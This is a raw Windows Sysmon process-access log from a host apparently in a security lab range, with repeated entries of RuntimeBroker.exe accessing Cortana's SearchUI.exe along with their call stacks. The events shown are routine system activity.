13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.664{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
